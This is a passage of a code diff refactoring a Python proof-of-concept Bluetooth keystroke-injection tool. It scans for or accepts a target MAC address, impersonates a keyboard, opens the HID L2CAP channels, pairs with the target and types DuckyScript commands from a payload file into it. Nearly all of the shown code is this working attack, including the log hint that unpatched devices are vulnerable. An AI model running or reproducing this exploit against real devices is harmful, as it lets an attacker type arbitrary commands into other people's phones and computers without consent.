XX:XX:XX:XX:XX:XX - mac_address_pattern = re.compile(r'^([0-9A-Fa-f]{2}[:-]){5}([0-9A-Fa-f]{2})$') - return mac_address_pattern.match(mac_address) is not None - -# Function to read DuckyScript from file -def read_duckyscript(filename='payload.txt'): - if os.path.exists(filename): - with open(filename, 'r') as file: - return [line.strip() for line in file.readlines()] - else: - log.warning(f"File {filename} not found. Skipping DuckyScript.") - return None +def establish_connections(connection_manager): + if not connection_manager.connect_all(): + raise ConnectionFailureException("Failed to connect to all required ports") # Main function def main(): log.basicConfig(level=log.DEBUG) - main_menu() - - target_address = input("\nWhat is the target address? Leave blank and we will scan for you: ") - - if target_address == "": - devices = scan_for_devices() - if devices: - if len(devices) > 1: # More than one device means a scan was performed - selection = int(input("\nSelect a device by number: ")) - 1 - if 0 <= selection < len(devices): - target_address = devices[selection][0] - else: - print("\nInvalid selection. Exiting.") - return - else: - # Only one device, means a known device was selected - target_address = devices[0][0] - else: - return - elif not is_valid_mac_address(target_address): - print("\nInvalid MAC address format. Please enter a valid MAC address.") + target_address = get_target_address() + if not target_address: + log.info("No target address provided. Exiting.") return - # Check if payload exists duckyscript = read_duckyscript() if not duckyscript: - duckyscript = "Hello There" log.info("Payload file not found. Exiting.") return - main_menu() - print(f"Attacking {target_address}\n") - - # Display Duckyscript after reading from file - print(f"Duckyscript after reading from file: {duckyscript}") - payload_line = duckyscript[0].replace('STRING ', '') - - restart_bluetooth_daemon() - - profile_proc = Process(target=register_hid_profile, args=('hci0', target_address)) - profile_proc.start() - child_processes.append(profile_proc) - - adapter = Adapter('hci0') - adapter.set_name("Robot POC") - adapter.set_class(0x002540) + adapter = setup_bluetooth(target_address) adapter.enable_ssp() try: - # Manage connections connection_manager = L2CAPConnectionManager(target_address) - sdp_client = connection_manager.create_connection(1) # SDP - hid_control_client = connection_manager.create_connection(17) # HID Control - hid_interrupt_client = connection_manager.create_connection(19) # HID Interrupt + connection_manager.create_connection(1) # SDP + connection_manager.create_connection(17) # HID Control + connection_manager.create_connection(19) # HID Interrupt - with PairingAgent('hci0', target_address) as agent: - if connection_manager.connect_all(): - client = connection_manager.clients[19] # HID Interrupt client - client.send_keypress('') # Empty report - time.sleep(0.5) - if duckyscript == "Hello There": - for letter in duckyscript: - if letter == " ": - client.send_keypress(Key_Codes.SPACE) - else: - client.send_keypress(Key_Codes[letter]) - log.info("No DuckyScript commands to execute.") - else: - # Iterate through each line in duckyscript list from payload.txt - for line in duckyscript: - if line.startswith("REM"): - continue # Ignore REM lines - elif line.startswith("STRING"): - text = line[7:] # Extract text after "STRING" - for letter in text: - # Send keypress for each letter - if letter == " ": - client.send_keypress(Key_Codes.SPACE) - else: - client.send_keypress(Key_Codes[letter]) - else: - raise ConnectionFailureException("Failed to connect to all required ports") + initialize_pairing('hci0', target_address) + establish_connections(connection_manager) + hid_interrupt_client = connection_manager.clients[19] + process_duckyscript(hid_interrupt_client, duckyscript) except ConnectionFailureException as e: log.error(f"Connection failure: {e}") terminate_child_processes() - log.debug("Device is most likely patched") sys.exit("Exiting script due to connection failure") if __name__ == "__main__":